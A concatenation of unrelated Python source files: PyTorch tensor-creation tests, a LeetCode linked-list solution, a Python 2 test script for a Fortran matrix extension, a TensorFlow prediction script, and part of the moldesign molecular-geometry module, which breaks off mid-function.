self.assertEqual(shape, torch.randint(2, shape, device=device, dtype=dt).shape)
self.assertEqual(shape, torch.randint_like(torch.zeros(shape, device=device, dtype=dt), 2).shape)
elif dt.is_complex:
self.assertRaises(RuntimeError, lambda: torch.randint(6, shape, device=device, dtype=dt).shape)
else:
self.assertEqual(shape, torch.randint(6, shape, device=device, dtype=dt).shape)
self.assertEqual(shape, torch.randint_like(torch.zeros(shape, device=device, dtype=dt), 6).shape)
if dt not in {torch.double, torch.float, torch.half, torch.bfloat16, torch.complex64, torch.complex128}:
self.assertRaises(RuntimeError, lambda: torch.rand(shape, device=device, dtype=dt).shape)
if dt == torch.double or dt == torch.float or dt.is_complex:
self.assertEqual(shape, torch.randn(shape, device=device, dtype=dt).shape)
self.assertEqual(shape, torch.randn_like(torch.zeros(shape, device=device, dtype=dt)).shape)
self.assertEqual((0,), torch.arange(0, device=device).shape)
self.assertEqual((0, 0), torch.eye(0, device=device).shape)
self.assertEqual((0, 0), torch.eye(0, 0, device=device).shape)
self.assertEqual((5, 0), torch.eye(5, 0, device=device).shape)
self.assertEqual((0, 5), torch.eye(0, 5, device=device).shape)
self.assertEqual((0,), torch.linspace(1, 1, 0, device=device).shape)
self.assertEqual((0,), torch.logspace(1, 1, 0, device=device).shape)
self.assertEqual((0,), torch.randperm(0, device=device).shape)
self.assertEqual((0,), torch.bartlett_window(0, device=device).shape)
self.assertEqual((0,), torch.bartlett_window(0, periodic=False, device=device).shape)
self.assertEqual((0,), torch.hamming_window(0, device=device).shape)
self.assertEqual((0,), torch.hann_window(0, device=device).shape)
self.assertEqual((1, 1, 0), torch.tensor([[[]]], device=device).shape)
self.assertEqual((1, 1, 0), torch.as_tensor([[[]]], device=device).shape)
@onlyCUDA
def test_tensor_factory_gpu_type_inference(self, device):
saved_type = torch.Tensor().type()
torch.set_default_tensor_type(torch.cuda.DoubleTensor)
torch.set_default_dtype(torch.float32)
self.assertIs(torch.float32, torch.tensor(0.).dtype)
self.assertEqual(torch.device(device), torch.tensor(0.).device)
torch.set_default_dtype(torch.float64)
self.assertIs(torch.float64, torch.tensor(0.).dtype)
self.assertEqual(torch.device(device), torch.tensor(0.).device)
torch.set_default_tensor_type(saved_type)
@onlyCUDA
def test_tensor_factory_gpu_type(self, device):
saved_type = torch.Tensor().type()
torch.set_default_tensor_type(torch.cuda.FloatTensor)
x = torch.zeros((5, 5))
self.assertIs(torch.float32, x.dtype)
self.assertTrue(x.is_cuda)
torch.set_default_tensor_type(torch.cuda.DoubleTensor)
x = torch.zeros((5, 5))
self.assertIs(torch.float64, x.dtype)
self.assertTrue(x.is_cuda)
torch.set_default_tensor_type(saved_type)
@skipCPUIf(True, 'compares device with cpu')
@dtypes(torch.int, torch.long, torch.float, torch.double)
def test_arange_device_vs_cpu(self, device, dtype):
cpu_tensor = torch.arange(0, 10, dtype=dtype, device='cpu')
device_tensor = torch.arange(0, 10, dtype=dtype, device=device)
self.assertEqual(cpu_tensor, device_tensor)
@onlyCUDA
@skipCUDAIfNotRocm
def test_arange_bfloat16(self, device):
ref_tensor = torch.tensor([0, 1, 2, 3], dtype=torch.bfloat16, device=device)
bfloat16_tensor = torch.arange(0, 4, dtype=torch.bfloat16, device=device)
self.assertEqual(ref_tensor, bfloat16_tensor)
# step=2
ref_tensor = torch.tensor([0, 2, 4], dtype=torch.bfloat16, device=device)
bfloat16_tensor = torch.arange(0, 6, step=2, dtype=torch.bfloat16, device=device)
self.assertEqual(ref_tensor, bfloat16_tensor)
@dtypes(*torch.testing.get_all_dtypes(include_bool=False, include_half=False))
@dtypesIfCUDA(*torch.testing.get_all_dtypes(include_bool=False, include_half=True))
def test_linspace(self, device, dtype):
_from = random.random()
to = _from + random.random()
res1 = torch.linspace(_from, to, 137, device=device, dtype=dtype)
res2 = torch.tensor((), device=device, dtype=dtype)
torch.linspace(_from, to, 137, dtype=dtype, out=res2)
self.assertEqual(res1, res2, atol=0, rtol=0)
# small tensor
self.assertEqual(torch.linspace(10, 20, 11, device=device, dtype=dtype),
torch.tensor(list(range(10, 21)), device=device, dtype=dtype))
# large tensor
if dtype not in (torch.int8, torch.uint8):
self.assertEqual(torch.linspace(10, 2000, 1991, device=device, dtype=dtype),
torch.tensor(list(range(10, 2001)), device=device, dtype=dtype))
# Vectorization on non-contiguous tensors
if dtype not in (torch.int8, torch.uint8): # int8 and uint8 are too small for this test
res = torch.rand(3, 3, 1000, device=device).to(dtype)
res = res.permute(2, 0, 1)
torch.linspace(0, 1000 * 3 * 3, 1000 * 3 * 3, out=res)
self.assertEqual(res.flatten(), torch.linspace(0, 1000 * 3 * 3, 1000 * 3 * 3, device=device, dtype=dtype))
self.assertRaises(RuntimeError, lambda: torch.linspace(0, 1, -1, device=device, dtype=dtype))
# steps = 1
self.assertEqual(torch.linspace(0, 1, 1, device=device, dtype=dtype),
torch.zeros(1, device=device, dtype=dtype), atol=0, rtol=0)
# steps = 0
self.assertEqual(torch.linspace(0, 1, 0, device=device, dtype=dtype).numel(), 0, atol=0, rtol=0)
# Check linspace for generating the correct output for each dtype.
start = 0 if dtype == torch.uint8 else -100
expected_lin = torch.tensor([start + .5 * i for i in range(401)], device=device, dtype=torch.double)
actual_lin = torch.linspace(start, start + 200, 401, device=device, dtype=dtype)
# If on GPU, allow for minor error depending on dtype.
tol = 0.
if device != 'cpu':
if dtype == torch.half:
tol = 1e-1
elif dtype == torch.float:
tol = 1e-5
elif dtype == torch.double:
tol = 1e-10
self.assertEqual(expected_lin.to(dtype), actual_lin, atol=tol, rtol=0)
# Check linspace for generating with start > end.
self.assertEqual(torch.linspace(2, 0, 3, device=device, dtype=dtype),
torch.tensor((2, 1, 0), device=device, dtype=dtype),
atol=0, rtol=0)
# Create non-complex tensor from complex numbers
if not dtype.is_complex:
self.assertRaises(RuntimeError, lambda: torch.linspace(1j, 2j, 3, device=device, dtype=dtype))
# Check for race condition (correctness when applied on a large tensor).
if dtype not in (torch.int8, torch.uint8, torch.int16, torch.half, torch.bfloat16):
y = torch.linspace(0, 999999 + (999999j if dtype.is_complex else 0),
1000000, device=device, dtype=dtype)
if dtype.is_complex:
cond = torch.logical_and(y[:-1].real < y[1:].real, y[:-1].imag < y[1:].imag)
else:
cond = y[:-1] < y[1:]
correct = all(cond)
self.assertTrue(correct)
# Check linspace for non-contiguous tensors.
x = torch.zeros(2, 3, device=device, dtype=dtype)
y = torch.linspace(0, 3, 4, out=x.narrow(1, 1, 2), dtype=dtype)
self.assertEqual(x, torch.tensor(((0, 0, 1), (0, 2, 3)), device=device, dtype=dtype), atol=0, rtol=0)
def test_linspace_deduction(self, device):
# Test deduction from input parameters.
self.assertEqual(torch.linspace(1, 2, device=device).dtype, torch.float32)
self.assertEqual(torch.linspace(1., 2, device=device).dtype, torch.float32)
self.assertEqual(torch.linspace(1., -2., device=device).dtype, torch.float32)
# TODO: Need fix
with self.assertRaises(RuntimeError):
torch.linspace(1j, -2j, device=device)
# The implementation of linspace+logspace goes through a different path
# when the steps arg is equal to 0 or 1. For other values of `steps`
# they call specialized linspace (or logspace) kernels.
LINSPACE_LOGSPACE_SPECIAL_STEPS = [0, 1]
# NOTE [Linspace+Logspace precision override]
# Our Linspace and logspace torch.half CUDA kernels are not very precise.
# Since linspace/logspace are deterministic, we can compute an expected
# amount of error (by testing without a precision override), adding a tiny
# amount (EPS) to that, and using that value as the override.
LINSPACE_LOGSPACE_EXTRA_EPS = 1e-5
# Compares linspace device vs. cpu
def _test_linspace(self, device, dtype, steps):
a = torch.linspace(0, 10, steps=steps, dtype=dtype, device=device)
b = torch.linspace(0, 10, steps=steps)
self.assertEqual(a, b, exact_dtype=False)
# See NOTE [Linspace+Logspace precision override]
@skipCPUIf(True, "compares with CPU")
@precisionOverride({torch.half: 0.0039 + LINSPACE_LOGSPACE_EXTRA_EPS})
@dtypesIfCUDA(*(torch.testing.get_all_fp_dtypes() + torch.testing.get_all_complex_dtypes()))
def test_linspace_device_vs_cpu(self, device, dtype):
self._test_linspace(device, dtype, steps=10)
@skipCPUIf(True, "compares with CPU")
@dtypesIfCUDA(*(torch.testing.get_all_fp_dtypes() + torch.testing.get_all_complex_dtypes()))
def test_linspace_special_steps(self, device, dtype):
for steps in self.LINSPACE_LOGSPACE_SPECIAL_STEPS:
self._test_linspace(device, dtype, steps=steps)
# Compares logspace device vs cpu
def _test_logspace(self, device, dtype, steps):
a = torch.logspace(1, 1.1, steps=steps, dtype=dtype, device=device)
b = torch.logspace(1, 1.1, steps=steps)
self.assertEqual(a, b, exact_dtype=False)
# Compares logspace device vs cpu
def _test_logspace_base2(self, device, dtype, steps):
a = torch.logspace(1, 1.1, steps=steps, base=2, dtype=dtype, device=device)
b = torch.logspace(1, 1.1, steps=steps, base=2)
self.assertEqual(a, b, exact_dtype=False)
# See NOTE [Linspace+Logspace precision override]
@skipCPUIf(True, "compares with CPU")
@precisionOverride({torch.half: 0.025 + LINSPACE_LOGSPACE_EXTRA_EPS})
@dtypesIfCUDA(torch.half, torch.float, torch.double)
@dtypes(torch.float, torch.double)
def test_logspace_device_vs_cpu(self, device, dtype):
self._test_logspace(device, dtype, steps=10)
# See NOTE [Linspace+Logspace precision override]
@skipCPUIf(True, "compares with CPU")
@precisionOverride({torch.half: 0.0201 + LINSPACE_LOGSPACE_EXTRA_EPS})
@dtypesIfCUDA(torch.half, torch.float, torch.double)
@dtypes(torch.float, torch.double)
def test_logspace_base2(self, device, dtype):
self._test_logspace_base2(device, dtype, steps=10)
@skipCPUIf(True, "compares with CPU")
@dtypesIfCUDA(torch.half, torch.float, torch.double)
@dtypes(torch.float, torch.double)
def test_logspace_special_steps(self, device, dtype):
for steps in self.LINSPACE_LOGSPACE_SPECIAL_STEPS:
self._test_logspace(device, dtype, steps=steps)
self._test_logspace_base2(device, dtype, steps=steps)
@precisionOverride({torch.half: 1e-1, torch.float: 1e-5, torch.double: 1e-10})
@dtypes(torch.uint8, torch.int8, torch.short, torch.int, torch.long, torch.float, torch.double)
@dtypesIfCUDA(torch.uint8, torch.int8, torch.short, torch.int, torch.long, torch.half, torch.float, torch.double)
def test_logspace(self, device, dtype):
_from = random.random()
to = _from + random.random()
res1 = torch.logspace(_from, to, 137, device=device, dtype=dtype)
res2 = torch.tensor((), device=device, dtype=dtype)
torch.logspace(_from, to, 137, device=device, dtype=dtype, out=res2)
self.assertEqual(res1, res2, atol=0, rtol=0)
self.assertRaises(RuntimeError, lambda: torch.logspace(0, 1, -1, device=device, dtype=dtype))
self.assertEqual(torch.logspace(0, 1, 1, device=device, dtype=dtype),
torch.ones(1, device=device, dtype=dtype), atol=0, rtol=0)
# Check precision - start, stop and base are chosen to avoid overflow
# steps is chosen so that step size is not subject to rounding error
# a tolerance is needed for gpu tests due to differences in computation
atol = None
rtol = None
if self.device_type == 'cpu':
atol = 0
rtol = 0
self.assertEqual(torch.tensor([2. ** (i / 8.) for i in range(49)], device=device, dtype=dtype),
torch.logspace(0, 6, steps=49, base=2, device=device, dtype=dtype),
atol=atol, rtol=rtol)
# Check non-default base=2
self.assertEqual(torch.logspace(1, 1, 1, 2, device=device, dtype=dtype),
torch.ones(1, device=device, dtype=dtype) * 2)
self.assertEqual(torch.logspace(0, 2, 3, 2, device=device, dtype=dtype),
torch.tensor((1, 2, 4), device=device, dtype=dtype))
# Check logspace_ for generating with start > end.
self.assertEqual(torch.logspace(1, 0, 2, device=device, dtype=dtype),
torch.tensor((10, 1), device=device, dtype=dtype), atol=0, rtol=0)
# Check logspace_ for non-contiguous tensors.
x = torch.zeros(2, 3, device=device, dtype=dtype)
y = torch.logspace(0, 3, 4, base=2, device=device, dtype=dtype, out=x.narrow(1, 1, 2))
self.assertEqual(x, torch.tensor(((0, 1, 2), (0, 4, 8)), device=device, dtype=dtype), atol=0, rtol=0)
@onlyOnCPUAndCUDA
@dtypes(torch.half, torch.float, torch.double)
def test_full_inference(self, device, dtype):
size = (2, 2)
prev_default = torch.get_default_dtype()
torch.set_default_dtype(dtype)
# Tests bool fill value inference
t = torch.full(size, True)
self.assertEqual(t.dtype, torch.bool)
# Tests integer fill value inference
t = torch.full(size, 1)
self.assertEqual(t.dtype, torch.long)
# Tests float fill value inference
t = torch.full(size, 1.)
self.assertEqual(t.dtype, dtype)
# Tests complex inference
t = torch.full(size, (1 + 1j))
ctype = torch.complex128 if dtype is torch.double else torch.complex64
self.assertEqual(t.dtype, ctype)
torch.set_default_dtype(prev_default)
def test_full_out(self, device):
size = (5,)
o = torch.empty(size, device=device, dtype=torch.long)
# verifies dtype/out conflict throws a RuntimeError
with self.assertRaises(RuntimeError):
torch.full(o.shape, 1., dtype=torch.float, out=o)
# verifies out dtype overrides inference
self.assertEqual(torch.full(o.shape, 1., out=o).dtype, o.dtype)
self.assertEqual(torch.full(size, 1, out=o).dtype, o.dtype)
# Class for testing random tensor creation ops, like torch.randint
class TestRandomTensorCreation(TestCase):
exact_dtype = True
# TODO: this test should be updated
@onlyCPU
def test_randint_inference(self, device):
size = (2, 1)
for args in [(3,), (1, 3)]: # (low,) and (low, high)
self.assertIs(torch.int64, torch.randint(*args, size=size).dtype)
self.assertIs(torch.int64, torch.randint(*args, size=size, layout=torch.strided).dtype)
self.assertIs(torch.int64, torch.randint(*args, size=size, generator=torch.default_generator).dtype)
self.assertIs(torch.float32, torch.randint(*args, size=size, dtype=torch.float32).dtype)
out = torch.empty(size, dtype=torch.float32)
self.assertIs(torch.float32, torch.randint(*args, size=size, out=out).dtype)
self.assertIs(torch.float32, torch.randint(*args, size=size, out=out, dtype=torch.float32).dtype)
out = torch.empty(size, dtype=torch.int64)
self.assertIs(torch.int64, torch.randint(*args, size=size, out=out).dtype)
self.assertIs(torch.int64, torch.randint(*args, size=size, out=out, dtype=torch.int64).dtype)
# TODO: this test should be updated
@onlyCPU
def test_randint(self, device):
SIZE = 100
def seed(generator):
if generator is None:
torch.manual_seed(123456)
else:
generator.manual_seed(123456)
return generator
for generator in (None, torch.Generator()):
generator = seed(generator)
res1 = torch.randint(0, 6, (SIZE, SIZE), generator=generator)
res2 = torch.empty((), dtype=torch.int64)
generator = seed(generator)
torch.randint(0, 6, (SIZE, SIZE), generator=generator, out=res2)
generator = seed(generator)
res3 = torch.randint(6, (SIZE, SIZE), generator=generator)
res4 = torch.empty((), dtype=torch.int64)
generator = seed(generator)
torch.randint(6, (SIZE, SIZE), out=res4, generator=generator)
self.assertEqual(res1, res2)
self.assertEqual(res1, res3)
self.assertEqual(res1, res4)
self.assertEqual(res2, res3)
self.assertEqual(res2, res4)
self.assertEqual(res3, res4)
self.assertTrue((res1 < 6).all().item())
self.assertTrue((res1 >= 0).all().item())
@dtypes(torch.half, torch.float, torch.double,
torch.complex32, torch.complex64, torch.complex128)
def test_randn(self, device, dtype):
SIZE = 100
for size in [0, SIZE]:
torch.manual_seed(123456)
res1 = torch.randn(size, size, dtype=dtype, device=device)
res2 = torch.tensor([], dtype=dtype, device=device)
torch.manual_seed(123456)
torch.randn(size, size, out=res2)
self.assertEqual(res1, res2)
@dtypes(torch.float, torch.double, torch.complex64, torch.complex128)
def test_rand(self, device, dtype):
SIZE = 100
for size in [0, SIZE]:
torch.manual_seed(123456)
res1 = torch.rand(size, size, dtype=dtype, device=device)
res2 = torch.tensor([], dtype=dtype, device=device)
torch.manual_seed(123456)
torch.rand(size, size, out=res2)
self.assertEqual(res1, res2)
@slowTest
def test_randperm(self, device):
if device == 'cpu':
rng_device = None
else:
rng_device = [device]
# Test core functionality. On CUDA, for small n, randperm is offloaded to CPU instead. For large n, randperm is
# executed on GPU.
for n in (100, 50000, 100000):
# Ensure both integer and floating-point numbers are tested. Half follows an execution path that is
# different from others on CUDA.
for dtype in (torch.long, torch.half, torch.float):
if n > 2049 and dtype == torch.half: # Large n for torch.half will raise an exception, do not test here.
continue
with torch.random.fork_rng(devices=rng_device):
res1 = torch.randperm(n, dtype=dtype, device=device)
res2 = torch.empty(0, dtype=dtype, device=device)
torch.randperm(n, out=res2, dtype=dtype, device=device)
self.assertEqual(res1, res2, atol=0, rtol=0)
# Default type is long
for n in (100, 10000):
self.assertEqual(torch.randperm(n, device=device).dtype, torch.long)
# randperm of 0 elements is an empty tensor
res1 = torch.randperm(0)
res2 = torch.tensor(5, dtype=dtype, device=device)
torch.randperm(0, out=res2)
self.assertEqual(res1.numel(), 0)
self.assertEqual(res2.numel(), 0)
# Test exceptions when n is too large for a floating point type
for dtype, small_n, large_n in ((torch.half, 2**11 + 1, 2**11 + 2),
(torch.float, 2**24 + 1, 2**24 + 2),
(torch.double, 2**25, # 2**53 + 1 is too large to run
2**53 + 2)):
res = torch.empty(0, dtype=dtype, device=device)
torch.randperm(small_n, out=res) # No exception expected
self.assertRaises(RuntimeError, lambda: torch.randperm(large_n, out=res, device=device))
# Test non-contiguous tensors
for n in (4, 5, 6, 10, 20):
non_contiguous_tensor = torch.zeros((2, 3), dtype=torch.long, device=device).t()
self.assertFalse(non_contiguous_tensor.is_contiguous())
with torch.random.fork_rng(devices=rng_device):
res = torch.randperm(n, dtype=torch.long, device=device)
torch.randperm(n, out=non_contiguous_tensor)
self.assertEqual(non_contiguous_tensor, res)
# Class for testing *like ops, like torch.ones_like
class TestLikeTensorCreation(TestCase):
exact_dtype = True
# TODO: this test should be updated
def test_ones_like(self, device):
expected = torch.ones(100, 100, device=device)
res1 = torch.ones_like(expected)
self.assertEqual(res1, expected)
# test boolean tensor
expected = torch.tensor([True, True], device=device, dtype=torch.bool)
res1 = torch.ones_like(expected)
self.assertEqual(res1, expected)
# TODO: this test should be updated
@onlyCPU
def test_empty_like(self, device):
x = torch.autograd.Variable(torch.Tensor())
y = torch.autograd.Variable(torch.randn(4, 4))
z = torch.autograd.Variable(torch.IntTensor([1, 2, 3]))
for a in (x, y, z):
self.assertEqual(torch.empty_like(a).shape, a.shape)
self.assertEqualTypeString(torch.empty_like(a), a)
def test_zeros_like(self, device):
expected = torch.zeros((100, 100,), device=device)
res1 = torch.zeros_like(expected)
self.assertEqual(res1, expected)
@deviceCountAtLeast(2)
def test_zeros_like_multiple_device(self, devices):
expected = torch.zeros(100, 100, device=devices[0])
x = torch.randn(100, 100, device=devices[1], dtype=torch.float32)
output = torch.zeros_like(x)
self.assertEqual(output, expected)
@deviceCountAtLeast(2)
def test_ones_like_multiple_device(self, devices):
expected = torch.ones(100, 100, device=devices[0])
x = torch.randn(100, 100, device=devices[1], dtype=torch.float32)
output = torch.ones_like(x)
self.assertEqual(output, expected)
# Full-like precedence is the explicit dtype then the dtype of the "like"
# tensor.
@onlyOnCPUAndCUDA
def test_full_like_inference(self, device):
size = (2, 2)
like = torch.empty((5,), device=device, dtype=torch.long)
self.assertEqual(torch.full_like(like, 1.).dtype, torch.long)
self.assertEqual(torch.full_like(like, 1., dtype=torch.complex64).dtype,
torch.complex64)
instantiate_device_type_tests(TestTensorCreation, globals())
instantiate_device_type_tests(TestRandomTensorCreation, globals())
instantiate_device_type_tests(TestLikeTensorCreation, globals())
if __name__ == '__main__':
run_tests()
|
from typing import Dict
class ListNode:
def __init__(self, x):
self.val = x
self.next = None
class Solution:
def removeZeroSumSublists(self, head: ListNode) -> ListNode:
curr = dummy = ListNode(0)
dummy.next = head
prefix_sum = 0
seen = {} # type: Dict[int, ListNode]
while curr:
prefix_sum += curr.val
node = seen.get(prefix_sum, curr)
while prefix_sum in seen:
seen.popitem()
seen[prefix_sum] = node
node.next, curr = curr.next, curr.next
return dummy.next
|
#!/usr/bin/python
import tlsvld
import scipy
import numpy
import math
U = tlsvld.array([[0.37471362,-0.07411912,-0.0379023],[-0.07411912,0.39010298,-0.03240841],[-0.0379023,-0.03240841,0.33057791]])
V = tlsvld.array([[0.38484156,-0.06933809,-0.04994903],[-0.06933809,0.41376374,-0.03275701],[-0.04994903,-0.03275701,0.33967632]])
#print U
#print V
#print "="*80
#U = scipy.array([[0.37471362,-0.07411912,-0.0379023],[-0.07411912,0.39010298,-0.03240841],[-0.0379023,-0.03240841,0.33057791]])
#V = scipy.array([[0.38484156,-0.06933809,-0.04994903],[-0.06933809,0.41376374,-0.03275701],[-0.04994903,-0.03275701,0.33967632]])
#V = scipy.array([[100.38484156,-0.06933809,-0.04994903],[-0.06933809,0.41376374,-0.03275701],[-0.04994903,-0.03275701,0.33967632]])
#print U
#print V
#print "="*80
#U = tlsvld.array([[7,7,7],[7,7,7],[7,7,7]])
#V = tlsvld.array([[4,4,4],[4,4,4],[4,4,4]])
W = tlsvld.array([[1.0,1.0,1.0],[1.0,1.0,1.0],[1.0,1.0,1.0]])
X = tlsvld.array([[4.0,4.0,4.0],[4.0,4.0,4.0],[4.0,4.0,4.0]])
print "SQD = ",tlsvld.sum_square_diff(W,X)
#print "trace(U) = ", tlsvld.trace3x3(X)
print "dtUV = ",tlsvld.diff_trace_uv(W,X)
print tlsvld.mul3x3(U,V)
print tlsvld.add3x3(U,V)
print "SUM(W) = ",tlsvld.sum3x3(X)
print tlsvld.subtract3x3(U,V)
#print tlsvld.trn3x3(U)
#print tlsvld.inv3x3(U)
#W = scipy.array([[0,0,0],[0,0,0],[0,0,0]])
#det, invU = tlsvld.inv3x3(U)
#print "PYTHON: det(U) = %s" % det
#print "PYTHON: inv(U) = %s" % invU
#print "="*80
#X = scipy.array([[1,0,0],[0,2,0],[0,0,3]])
#Y = scipy.array([[1,0,0],[0,2,0],[0,0,3]])
#print tlsvld.add3x3(X,Y)
#print tlsvld.calc_ccuij(X, Y)
#print "="*80
print "CCuij = %s" % tlsvld.calc_ccuij(U, V)
#print "EIGENS = ", tlsvld.jacobi(U,3,3, EIGENS, EVECS )
print U
print "EIGENS = ", tlsvld.eigenvalues(U)
x1 = 1.00
y1 = 2.00
z1 = 3.00
x2 = 6.00
y2 = 5.00
z2 = 4.00
d = math.sqrt( (x1-x2)**2 + (y1-y2)**2 + (z1-z2)**2 )
U = tlsvld.array([[0.37471362,-0.07411912,-0.0379023],[-0.07411912,0.39010298,-0.03240841],[-0.0379023,-0.03240841,0.33057791]])
V = tlsvld.array([[0.38484156,-0.06933809,-0.04994903],[-0.06933809,0.41376374,-0.03275701],[-0.04994903,-0.03275701,0.33967632]])
print d
a = tlsvld.array([x1,y1,z1])
b = tlsvld.array([x2,y2,z2])
# n = numpy.array([(a[0] - b[0])/d, (a[1] - b[1])/d, (a[2] - b[2])/d])
# Un = numpy.dot(numpy.dot(n, U), numpy.transpose(n))
# Vn = numpy.dot(numpy.dot(n, V), numpy.transpose(n))
# return abs(Un - Vn)
n = numpy.array([(a[0] - b[0])/d, (a[1] - b[1])/d, (a[2] - b[2])/d])
Un = numpy.dot(numpy.dot(n, U), numpy.transpose(n))
Vn = numpy.dot(numpy.dot(n, V), numpy.transpose(n))
print "[Python] DOT(n, U) = ", numpy.dot(n, U)
print "[Python] d = ", d
print "[Python] Rosenfeld = ", abs(Un - Vn)
print "="*80
print "[Fortran] Rosenfeld = ", tlsvld.rosenfeld(a,b,U,V)
|
import os
import re
from tqdm import tqdm
import tensorflow as tf
from erinn.python.generator import PredictGenerator
from erinn.python.utils.io_utils import read_config_file, get_pkl_list, read_pkl, write_pkl
# setting
config_file = os.path.join('..', 'config', 'config.yml')
config = read_config_file(config_file)
glob_para_pkl = config['glob_para_pkl']
pkl_dir_test = os.path.join('..', 'data', 'raw_data', 'test')
model_dir = os.path.join('..', 'models', 'txrx')
weights_dir = os.path.join(model_dir, 'weights')
predictions_dir = os.path.join(model_dir, 'predictions')
preprocess_generator = config['preprocess_generator']
gpus = 1
# Allowing GPU memory growth
if tf.__version__.startswith('1.'):
config = tf.ConfigProto()
config.gpu_options.allow_growth = True
session = tf.Session(config=config)
tf.keras.backend.set_session(session)
else:
physical_gpus = tf.config.experimental.list_physical_devices('GPU')
if physical_gpus:
try:
# Set visible gpus in TensorFlow
tf.config.experimental.set_visible_devices(physical_gpus[0:gpus], 'GPU')
visible_gpus = tf.config.experimental.get_visible_devices('GPU')
# Currently, memory growth needs to be the same across GPUs
for visible_gpu in visible_gpus:
tf.config.experimental.set_memory_growth(visible_gpu, True)
print('The memory growth of', visible_gpu, ':', tf.config.experimental.get_memory_growth(visible_gpu))
logical_gpus = tf.config.experimental.list_logical_devices('GPU')
print(len(physical_gpus), "Physical GPUs,", len(logical_gpus), "Logical GPUs")
except RuntimeError as e:
# Visible devices/Memory growth/Virtual devices must be set before GPUs have been initialized
print(e)
else:
print("Not enough GPU hardware devices available")
# load custom keras model and weights
pattern = re.compile(r'\'([^\']+)\'')
module_name, py_file = re.findall(pattern, config['custom_NN'])
loader = importlib.machinery.SourceFileLoader(module_name, py_file)
spec = importlib.util.spec_from_loader(module_name, loader)
module = importlib.util.module_from_spec(spec)
loader.exec_module(module)
model = getattr(module, module_name)()
model.load_weights(os.path.join(weights_dir, 'trained_weight.h5'))
# data generator
pkl_list_test = get_pkl_list(pkl_dir_test)
input_shape = model.input_shape[1:]
output_shape = model.output_shape[1:]
testing_generator = PredictGenerator(pkl_list_test, input_shape, output_shape,
batch_size=64, glob_para_pkl=glob_para_pkl,
**preprocess_generator)
# Prediction
print('\nPredict.')
predict = model.predict_generator(testing_generator, workers=os.cpu_count(), verbose=True)
# Save
os.makedirs(predictions_dir, exist_ok=True)
with tqdm(total=len(pkl_list_test), desc='write pkl') as pbar:
for i, pred in enumerate(predict):
data = read_pkl(pkl_list_test[i])
data['synth_V'] = data.pop('inputs').reshape(input_shape[0:2])
data['synth_log_rho'] = data.pop('targets').reshape(output_shape[0:2])
data['pred_log_rho'] = pred.reshape(output_shape[0:2])
suffix = re.findall(r'\d+.pkl', pkl_list_test[i])[0]
write_pkl(data, os.path.join(predictions_dir, f'result_{suffix}'))
pbar.update()
|
from __future__ import print_function, absolute_import, division
from future.builtins import *
from future import standard_library
standard_library.install_aliases()
# Copyright 2017 Autodesk Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import numpy as np
import moldesign as mdt
import moldesign.molecules.atomcollections
from moldesign import external
from moldesign.mathutils import sub_angles, apply_4x4_transform
from . import toplevel, angle, dihedral
from .coords import _infer_dihedral
@toplevel
def set_distance(a1, a2, newlength, adjustmol=True):
""" Set the distance between two atoms. They will be adjusted along the vector separating them.
If the two atoms are A) bonded, B) not part of the same ring system, and C) ``adjustmol`` is
True, then the entire molecule's positions will be modified as well
Args:
a1,a2 (mdt.Atom): atoms to adjust
newlength (u.Scalar[length]): new length to set
adjustmol (bool): Adjust all atoms on either side of this bond?
"""
#TODO: lots of room for optimization here
if adjustmol:
assert a1.molecule is not None
assert a1.molecule == a2.molecule
vec = a1.position - a2.position
dist = np.sqrt(vec.dot(vec))
direction = (vec / dist)
delta = newlength - dist
if np.abs(delta) < 1.0e-5 * delta.get_units(): return
if not adjustmol:
a1.position += direction * delta / 2.0
a2.position -= direction * delta / 2.0
else:
mol = a1.molecule
indices, sign = _get_fragment_indices(mol, a1, a2)
mol.positions[indices] += delta*direction*sign
@toplevel
def set_angle(a1, a2, a3, theta, adjustmol=True):
""" Set the angle between bonds a1-a2 and a3-a2. The atoms will be adjusted along the
gradient of the angle.
If ``adjustmol`` is True and the topology is unambiguous, then the entire molecule's positions
will be modified as well
Args:
a1,a2,a3 (mdt.Atom): atoms to adjust
theta (u.Scalar[angle]): new angle to set
adjustmol (bool): Adjust all atoms on either side of this bond?
"""
# TODO: deal with co-linear a1, a2, a3 - the rotation axis is ill-defined in this case \
# (require an axis to be specified)
# TODO: weakly cache the rotation axis so that users can set angle to 0 or 180 without losing the axis
current = angle(a1, a2, a3)
rotation = sub_angles(current, theta)
if abs(rotation) < 1.0e-6: return
axis = np.cross(a1.position - a2.position, a3.position - a2.position) # do vecs need to be normalized?
if not adjustmol:
rotmat_l = external.transformations.rotation_matrix(rotation / 2.0, axis, a2.position)
rotmat_r = external.transformations.rotation_matrix(-rotation / 2.0, axis, a2.position)
a1.position = apply_4x4_transform(rotmat_l, a1.position)
a3.position = apply_4x4_transform(rotmat_r, a3.position)
else:
mol = a2.molecule
indices, sign = _get_fragment_indices(mol, a1, a2)
rotmat = external.transformations.rotation_matrix(rotation, axis*sign, a2.position)
mol.positions[indices] = apply_4x4_transform(rotmat, mol.positions[indices])
@toplevel
def set_dihedral(a1, a2=None, a3=None, a4=None, theta=None, adjustmol=True):
""" Set the twist angle of atoms a1 and a4 around the central bond a2-a3. The atoms will be
adjusted along the gradient of the angle.
Can be called as ``set_dihedral(a1, a2, a3, a4, theta, adjustmol=True)``
OR ``set_dihedral(a2, a2, theta, adjustmol=True)``
OR ``set_dihedral(bond, theta, adjustmol=True)``
If ``adjustmol`` is True and the topology is unambiguous, then the entire molecule's positions
will be modified as well
Args:
a1 (mdt.Bond): central bond in dihedral
a1,a2 (mdt.Atom): atoms around central bond in dihedral
a3, a4 (mdt.Atom):
theta (u.Scalar[angle]): new angle to set
adjustmol (bool): Adjust all atoms on either side of this bond?
"""
# TODO: deal with co-linear a1/a4, a2, a3 - the angle is ill-defined \
# (should just an arbitrary axis normal to the central bond)
if a4 is None:
if isinstance(a1, mdt.Bond):
if theta is None:
theta = a2
a1, a2 = a1.a1, a1.a2
if a3 is not None and theta is None:
theta, a3 = a3, theta
elif a3 is not None or a4 is not None or theta is None:
raise ValueError('Invalid number of arguments for set_dihedral')
a1, a2, a3, a4 = _infer_dihedral(a1, a2)
current = dihedral(a1, a2, a3, a4)
rotation = sub_angles(theta, current)
if abs(rotation) < 1.0e-6: return
axis = a2.position - a3.position
